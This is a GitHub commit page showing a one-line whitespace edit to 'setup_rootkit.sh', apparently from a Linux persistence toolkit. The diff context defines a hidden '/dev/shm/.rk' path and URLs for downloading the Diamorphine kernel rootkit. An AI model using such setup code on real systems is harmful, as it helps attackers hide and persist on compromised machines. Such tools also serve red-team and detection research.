Skip to content

Commit

Permalink
Update setup_rootkit.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
Aegrah authored Nov 28, 2024
1 parent 327e2ef commit ae404d5
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion modules/setup_rootkit.sh
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@ setup_rootkit() {
# Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194

local rk_path="/dev/shm/.rk"
local tmp_path="/tmp"
local tmp_path="/tmp"
local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
local clone_url="https://github.com/Aegrah/Diamorphine.git"
Expand Down

0 comments on commit ae404d5

Please sign in to comment.